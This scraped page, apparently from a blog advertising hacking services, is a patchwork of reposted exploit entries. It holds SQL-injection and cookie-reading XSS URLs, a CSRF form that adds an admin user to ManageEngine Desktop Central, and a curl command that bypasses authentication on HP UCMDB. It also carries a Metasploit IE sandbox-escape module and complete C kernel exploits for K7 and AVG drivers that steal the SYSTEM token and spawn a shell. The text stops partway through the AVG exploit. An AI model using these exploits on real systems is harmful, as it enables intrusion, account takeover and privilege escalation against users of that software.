source: https://www.securityfocus.com/bid/48878/info
Willscript Recipes website Script Silver Edition is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to execute arbitrary code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/new_recipes/recipes/viewRecipe.php?recipeId=44
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863119084
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
<html>
<!--
# Exploit Title: ManageEngine Desktop Central 9 Add and admin user through Cross-Site Request Forgery (CSRF)
# Date: 05 December 2014
# Exploit Author: Mohamed Idris – Help AG Middle East
# Vendor Homepage: http://www.manageengine.com/
# Software Link: http://www.manageengine.com/products/desktop-central/
# Version: All versions below build 90121
# Tested on: Version 9 Build 90087
# CVEID: CVE-2014-9331
# Vulnerability Fix: http://www.manageengine.com/products/desktop-central/cve20149331-cross-site-request-forgery.html
POC Code:
When an authenticated application admin clicks a link to the below code, you well get a user “Hacker” with the password “HackerPass” added to the application (convincing the admin to click on a link is so easy ;)).
Remember to change the IP to the target server IP address in the code.
-->
<!-- CSRF PoC - Add an admin account -->
<body>
<form action="http://<Server-IP>:8020/STATE_ID/1417736606982/roleMgmt.do?actionToCall=addUser&SUBREQUEST=XMLHTTP" method="POST">
<input type="hidden" name="AuthenticationType" value="DC" />
<input type="hidden" name="newDCAuthUserName" value="Hacker" />
<input type="hidden" name="newDCAuthUserPassword" value="HackerPass" />
<input type="hidden" name="DCAuthconfirmPassword" value="HackerPass" />
<input type="hidden" name="newDCAuthUserEmail" value="" />
<input type="hidden" name="newDCAuthUserPNumber" value="" />
<input type="hidden" name="newADAuthUserEmail" value="" />
<input type="hidden" name="newADAuthUserPNumber" value="" />
<input type="hidden" name="MapType" value="ALL" />
<input type="hidden" name="aduserSearch" value="" />
<input type="hidden" name="searchValue" value="Search" />
<input type="hidden" name="aduserSearchRO" value="" />
<input type="hidden" name="searchValue" value="Search" />
<input type="hidden" name="action1" value="DC_ADD_USER" />
<input type="hidden" name="addUser" value="Add User" />
<input type="hidden" name="cancle" value="Cancel" />
<input type="hidden" name="customerids" value="" />
<input type="hidden" name="roleListDCAuth" value="1" />
<input type="hidden" name="PERSONALISE_LANGUAGE" value="en_US" />
<input type="hidden" name="domainListADAuth" value="-1" />
<input type="hidden" name="roleListADAuth" value="-1" />
<input type="hidden" name="PERSONALISE_LANGUAGE" value="en_US" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Mogwai Security Advisory MSA-2015-02
----------------------------------------------------------------------
Title: Hewlett-Packard UCMDB - JMX-Console Authentication Bypass
CVE-ID: CVE-2014-7883
Product: Hewlett-Packard Universal CMDB (UCMDB)
Affected versions: UCMDB 10.10 (Other versions might also be affected)
Impact: high
Remote: yes
Product link: http://www8.hp.com/us/en/software-solutions/configuration-management-system-database/index.html
Reported: 14/11/2014
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
Vendor's Description of the Software:
----------------------------------------------------------------------
The HP Universal CMDB (UCMDB) automatically collects and manages accurate and
current business service definitions, associated infrastructure relationships and
detailed information on the assets, and is a central component in many of the key processes in your
IT organization, such as change management, asset management, service management, and business
service management. The UCMDB ensures that these processes can rely on comprehensive and
true data for all business services. Together with HP UCMDB Configuration Manager
(UCMDB-CM) you can standardize your IT environments, and make sure they comply with clear
policies, and defined authorization process.
Many IT organizations turn to a CMDB and configuration management processes to create a
shared single version of truth to support business service management, IT service management,
change management, and asset management initiatives. These initiatives help align IT efforts
with business requirements and run IT operations more efficiently and effectively.
The initiatives success depends on the CMDB providing a complete view into the
configuration items (CIs) and assets as well as how various IT elements relate together to deliver
the business service.
-----------------------------------------------------------------------
Business recommendation:
-----------------------------------------------------------------------
Apply configuration changes from HP
https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsearch/document/KM01351169
-- CVSS2 Ratings ------------------------------------------------------
CVSS Base Score: 6.4
Impact Subscore: 4.9
Exploitability Subscore: 10
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:N)
-----------------------------------------------------------------------
Vulnerability description:
----------------------------------------------------------------------
UCMB administrators heavily rely on a JMX-Console, which is installed by
default.
The JMX-Console web application in UCMDB performs access control only for
the GET and POST methods, which allows remote attackers to send requests
to this application's GET handler by using a different method (for example
HEAD).
The web.xml file of the JMX Console contains following security constrains:
<security-constraint>
<web-resource-collection>
<web-resource-name>Protected Pages</web-resource-name>
<url-pattern>/*</url-pattern>
<http-method>GET</http-method>
<http-method>POST</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>sysadmin</role-name>
</auth-constraint>
</security-constraint>
<security-constraint>
<web-resource-collection>
<web-resource-name>Callhome Servlet</web-resource-name>
<url-pattern>/callhome</url-pattern>
<http-method>GET</http-method>
<http-method>POST</http-method>
</web-resource-collection>
</security-constraint>
This vulnerability is identical with CVE-2010-0738 (JBoss JMX-Console
Authentication bypass). This can be used to create a new account which
can then be used to access the JMX console.
Proof of concept:
----------------------------------------------------------------------
The following Curl command will send a HEAD request to create a new user
"pocuser" in the UCMDB Backend:
curl -I
"http://foobar:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser"
Disclosure timeline:
----------------------------------------------------------------------
14/11/2014: Reporting issue to HP
18/11/2014: Re-Reporting, as no acknowledge received
18/11/2014: Acknowledge from HP
02/01/2015: Requesting status update from HP
29/01/2015: Requesting status update from HP
31/01/2015: Response from HP, they plan to release the advisory next week
02/05/2015: HP releases security bulletin
03/05/2015: Mogwai security bulletin release
Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab
References:
----------------------------------------------------------------------
Official HP security bulletin
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04553906
----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)
info@mogwaisecurity.de
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info, {
'Name' => 'MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape',
'Description' => %q{
This module abuses a process creation policy in Internet Explorer's sandbox, specifically
the Microsoft Remote Desktop Services Web Proxy IE one, which allows the attacker to escape
the Protected Mode, and execute code with Medium Integrity. At the moment, this module only
bypass Protected Mode on Windows 7 SP1 and prior (32 bits). This module has been tested
successfully on Windows 7 SP1 (32 bits) with IE 8 and IE 11.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # From Threat Intel of Symantec
'Henry Li', # Public vulnerability analysis
'juan vazquez' # Metasploit module
],
'Platform' => 'win',
'SessionTypes' => ['meterpreter'],
'Arch' => [ARCH_X86],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'WfsDelay' => 30
},
'Targets' =>
[
[ 'Protected Mode (Windows 7) / 32 bits',
{
'Arch' => ARCH_X86
}
]
],
'DefaultTarget' => 0,
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true
},
'References' =>
[
['CVE', '2015-0016'],
['MSB', 'MS15-004'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explorer-sandbox/']
],
'DisclosureDate' => 'Jan 13 2015'
}))
end
def check
temp = get_env('WINDIR')
dll_path = "#{temp}\\System32\\TSWbPrxy.exe"
win_ver = sysinfo['OS']
unless win_ver =~ /Windows Vista|Windows 2008|Windows 2012|Windows [78]/
return Exploit::CheckCode::Safe
end
unless file_exist?(dll_path)
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Detected
end
def exploit
print_status('Checking target...')
unless check == Exploit::CheckCode::Detected
fail_with(Failure::NotVulnerable, 'System not vulnerable')
end
if session.platform !~ /^x86\//
fail_with(Failure::NotVulnerable, 'Sorry, this module currently only allows x86/win32 sessions at the moment')
end
win_ver = sysinfo['OS']
if win_ver =~ /Windows 2012|Windows 8/
fail_with(Failure::NotVulnerable, 'This module doesn\'t run on Windows 8/2012 at the moment')
end
print_status('Checking the Process Integrity Level...')
unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NotVulnerable, 'Not running at Low Integrity')
end
cmd = cmd_psh_payload(
payload.encoded,
payload_instance.arch.first,
{ :remove_comspec => true }
)
print_status('Storing payload on environment variable...')
cmd.gsub!('powershell.exe ','')
session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', cmd)
print_status('Exploiting...')
temp = get_env('TEMP')
# Using the old meterpreter loader, if it's loaded with
# Reflective DLL Injection the exceptions in the sandbox
# policy won't apply.
session.core.load_library(
'LibraryFilePath' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0016', 'cve-2015-0016.dll'),
'TargetFilePath' => temp + '\\cve-2015-0016.dll',
'UploadLibrary' => true,
'Extension' => false,
'SaveToDisk' => false
)
end
def cleanup
session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', nil)
super
end
end
source: https://www.securityfocus.com/bid/48883/info
The 'com_virtualmoney' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Virtual Money 1.5 is affected; other versions may also be vulnerable.
www.example.com/index.php?option=com_virtualmoney&view=landpage&task=subcategory&catid=[EXPLOIT]
source: https://www.securityfocus.com/bid/48896/info
Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected.
http://www.example.com/sit/report_marketing.php?mode=report&exc[0]=1'
source: https://www.securityfocus.com/bid/48896/info
Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected.
http://www.example.com/sit/billable_incidents.php?sites[]=-1 union select 1,concat_ws(':',user(),database())
source: https://www.securityfocus.com/bid/48896/info
Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected.
http://www.example.com/sit/search.php?search_string=1' union select 1,version()
En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Blind OS command injection with time delays”.
Para resolver el laboratorio, tenemos que ocasionar un delay de tiempo de respuesta en el servidor de 10 segundos. Para ello, haremos uso del OS Command Injection que se encuentra en la función de feedback.
Por lo que nos dirigimos la botón de “Submit feedback”:
Como podemos observar, hay unos cuantos campos a rellenar. Por lo que vamos a rellenarlos:
Ahora, antes de enviar el feedback. Preparamos el burp suite para que reciba las peticiones:
Con esto listo, enviamos el feedback para captar la petición:
Esta es la petición que se envía al servidor cuando se envía feedback. Para tratar con ella, la enviamos al repeater pulsando Ctrl R:
Una vez en el repeater, podemos observar como una petición válida simplemente obtiene una respuesta de estado 200 y no mucho más.
Sin embargo, entre todo los parámetros que se están enviando, vamos a intentar ver si podemos ejecutar un comando en alguno de ellos:
En el campo del mensaje, podemos escapar un comando para que se ejecute y así causemos un delay de respuesta de 10 segundos en el servidor, que era lo que nos pedía el enunciado.
De esta forma, resolvemos el laboratorio:
source: https://www.securityfocus.com/bid/48896/info
Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected.
http://www.example.com/sit/tasks.php?selected[]=1'&action=markcomplete
source: https://www.securityfocus.com/bid/48902/info
MBoard is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
A successful exploit may aid in phishing attacks; other attacks are possible.
MBoard 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/go.php?url=http://example.com
source: https://www.securityfocus.com/bid/48905/info
PHPJunkYard GBook is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHPJunkYard GBook 1.7 is vulnerable; other versions may also be affected.
http://www.example.com/templates/default/admin_reply.php?error=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/admin_reply.php?comments=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29 ;%3C/script%3E
http://www.example.com/templates/default/admin_reply.php?nosmileys=%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E
http://www.example.com/templates/default/admin_reply.php?num=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/comments.php?name=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/comments.php?from=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/comments.php?name=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/comments.php?email=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/comments.php?added=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/comments.php?i=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/admin_tasks.php?error=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/admin_tasks.php?task=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/admin_tasks.php?task_description=%3Cscript%3Ealert%28document.cookie%29;%3C/sc ript%3E
http://www.example.com/templates/default/admin_tasks.php?action=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E
http://www.example.com/templates/default/admin_tasks.php?button=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E
http://www.example.com/templates/default/admin_tasks.php?num=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/emoticons_popup.php?list_emoticons=%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E
http://www.example.com/templates/default/error.php?myproblem=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/error.php?backlink=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/no_comments.php?lang[t06]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/overall_footer.php?settings[pages_top]=%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E
http://www.example.com/templates/default/overall_footer.php?settings[show_nospam]=1&settings[target]=%22%3E%3Cscrip t%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/overall_footer.php?settings[show_nospam]=1&settings[tpl_path]=%22%3E%3Cscr ipt%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/templates/default/overall_header.php?settings[gbook_title]=%3Cscript%3Ealert%28document.cookie%2 9;%3C/script%3E
http://www.example.com/templates/default/sign_form.php?name=%22%3E%3Cscript%3Ealert%28document.cook
/*
Exploit Title - K7 Computing Multiple Products Arbitrary Write Privilege Escalation
Date - 04th February 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://www.k7computing.co.uk/
Tested Version - 14.2.0.240
Driver Version - 12.8.0.104 - K7Sentry.sys
Tested on OS - 32bit Windows XP SP3
OSVDB - http://www.osvdb.org/show/osvdb/113007
CVE ID - CVE-2014-9643
Vendor fix url - none
Fixed version - 14.2.0.253
Fixed driver ver - 12.8.0.118
*/
#include <stdio.h>
#include <windows.h>
#define INBUFSIZE 4
#define BUFSIZE 4096
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
DWORD ProfileSource,
PULONG Interval);
typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG RegionSize,
IN ULONG AllocationType,
IN ULONG Protect);
typedef void (*FUNCTPTR)();
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc2,0x08 // ret 8 Away from the kernel
};
DWORD HalDispatchTableAddress()
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_MODULE_INFORMATION pModuleInfo;
DWORD HalDispatchTable;
CHAR kFullName[256];
PVOID kBase = NULL;
LPSTR kName;
HMODULE Kernel;
FUNCTPTR Hal;
ULONG len;
NTSTATUS status;
NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
if (!status)
{
printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
return -1;
}
pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
if(pModuleInfo == NULL)
{
printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
memset(kFullName, 0x00, sizeof(kFullName));
strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
kBase = pModuleInfo->Module[0].Base;
printf("[i] Kernel base name %s\n", kFullName);
kName = strrchr(kFullName, '\\');
Kernel = LoadLibraryA(++kName);
if(Kernel == NULL)
{
printf("[-] Failed to load kernel base\n\n");
return -1;
}
Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
if(Hal == NULL)
{
printf("[-] Failed to find HalDispatchTable\n\n");
return -1;
}
printf("[i] HalDispatchTable address 0x%08x\n", Hal);
printf("[i] Kernel handle 0x%08x\n", Kernel);
printf("[i] Kernel base address 0x%08x\n", kBase);
HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);
printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);
if(!HalDispatchTable)
{
printf("[-] Failed to calculate HalDispatchTable\n\n");
return -1;
}
return HalDispatchTable;
}
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP;
if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7";
if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003;
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtAllocateVirtualMemory NtAllocateVirtualMemory;
_NtQueryIntervalProfile NtQueryIntervalProfile;
BYTE *inbuffer;
NTSTATUS allocstatus;
LPVOID base_addr = (LPVOID)0x00000001;
DWORD size = BUFSIZE;
DWORD written;
int rwresult;
unsigned char buffer[BUFSIZE];
HANDLE hDevice;
DWORD dwRetBytes = 0;
DWORD HalDispatchTableTarget;
ULONG time = 0;
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf(" K7 Computing Multiple Products (K7Sentry.sys) Arbitrary Write EoP Exploit \n");
printf(" Tested on Windows XP SP3 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
}
if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
sprintf(devhandle, "\\\\.\\%s", "K7Sentry");
NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile)
{
printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
return -1;
}
NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");
if (!NtAllocateVirtualMemory)
{
printf("[-] Unable to resolve NtAllocateVirtualMemory\n");
return -1;
}
allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (allocstatus)
{
printf("[-] An error occured while mapping executable memory. Status = 0x%08x\n", allocstatus);
printf("Error : %d\n", GetLastError());
return -1;
}
printf("[+] NtAllocateVirtualMemory allocated memory at 0x%.8x\n", base_addr);
memset(buffer, 0x90, BUFSIZE);
memcpy(buffer+0x00000005, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written);
if (rwresult == 0)
{
printf("[-] An error occured while mapping writing memory: %d\n", GetLastError());
return -1;
}
printf("[+] WriteProcessMemory %d bytes written\n", written);
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
inbuffer = VirtualAlloc(NULL, INBUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
memset(inbuffer, 0x41, INBUFSIZE);
HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);
printf("[~] Press any key to send Exploit . . .\n");
getch();
DeviceIoControl(hDevice, 0x95002570, inbuffer, INBUFSIZE, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
printf("[+] Buffer sent\n");
CloseHandle(hDevice);
printf("[+] Spawning SYSTEM Shell\n");
NtQueryIntervalProfile(2, &time);
spawnShell();
return 0;
}
/*
Exploit Title - AVG Internet Security 2015 Arbitrary Write Privilege Escalation
Date - 04th February 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://www.avg.com/
Tested Version - 2015.0.5315
Driver Version - 15.0.0.5204 - avgtdix.sys
Tested on OS - 32bit Windows XP SP3
OSVDB - http://www.osvdb.org/show/osvdb/113824
CVE ID - CVE-2014-9632
Vendor fix url - http://www.avg.com/eu-en/avg-release-notes
Fixed Version - 2015.0.5557
Fixed driver ver - 15.0.0.5553
Note
----
Overwritten HAL dispatch table after exploit
kd> dps nt!HalDispatchTable l c
8054ccb8 00000003
8054ccbc 00340000
8054ccc0 8678d9a0
8054ccc4 0a050002
8054ccc8 6e66744e
8054cccc 001c0707
8054ccd0 00000180
8054ccd4 000001a4
8054ccd8 867d6690
8054ccdc 86706480
8054cce0 00000000
8054cce4 804e42d1 nt!ObpTraceDepth+0x19
10 pointers get overwritten. Since input buffer is in our control and pointers
are static in XP I've triggered the overwrite again restoring the pointers.
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 4096
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
DWORD ProfileSource,
PULONG Interval);
typedef void (*FUNCTPTR)();
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
